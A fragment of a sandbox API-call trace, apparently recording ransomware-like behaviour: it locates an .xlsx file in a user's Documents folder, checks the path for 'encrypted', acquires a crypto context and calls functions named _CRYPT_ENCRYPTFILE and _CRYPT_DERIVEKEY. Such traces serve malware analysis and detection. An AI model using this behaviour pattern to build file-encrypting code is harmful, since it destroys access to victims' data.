dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.806] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.806] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.806] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.806] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.806] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.806] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.807] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.807] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.807] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67004760, ftCreationTime.dwHighDateTime=0x1d58643, ftLastAccessTime.dwLowDateTime=0x23634540, ftLastAccessTime.dwHighDateTime=0x1d5b4e0, ftLastWriteTime.dwLowDateTime=0x23634540, ftLastWriteTime.dwHighDateTime=0x1d5b4e0, nFileSizeHigh=0x0, nFileSizeLow=0x106c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="7hWyNz2k.xlsx", cAlternateFileName="7HWYNZ~1.XLS")) returned 0x7c20c0 [0032.807] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.807] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67004760, ftCreationTime.dwHighDateTime=0x1d58643, ftLastAccessTime.dwLowDateTime=0x23634540, ftLastAccessTime.dwHighDateTime=0x1d5b4e0, ftLastWriteTime.dwLowDateTime=0x23634540, ftLastWriteTime.dwHighDateTime=0x1d5b4e0, nFileSizeHigh=0x0, nFileSizeLow=0x106c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="7hWyNz2k.xlsx", cAlternateFileName="7HWYNZ~1.XLS")) returned 0x7c20c0 [0032.807] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.807] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.807] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hWyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WyNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yNz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nz2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z2k.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.808] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.808] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.809] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.809] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.809] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67004760, ftCreationTime.dwHighDateTime=0x1d58643, ftLastAccessTime.dwLowDateTime=0x23634540, ftLastAccessTime.dwHighDateTime=0x1d5b4e0, ftLastWriteTime.dwLowDateTime=0x23634540, ftLastWriteTime.dwHighDateTime=0x1d5b4e0, nFileSizeHigh=0x0, nFileSizeLow=0x106c8, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="7hWyNz2k.xlsx", cAlternateFileName="7HWYNZ~1.XLS")) returned 0x7c2240 [0032.809] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.809] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.809] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.809] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.809] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.809] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.809] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.810] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.810] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.810] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.810] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.810] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0032.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.811] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.811] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.811] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.812] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.812] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.812] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.812] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.812] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.812] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.812] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.812] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.812] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.812] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.812] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.813] 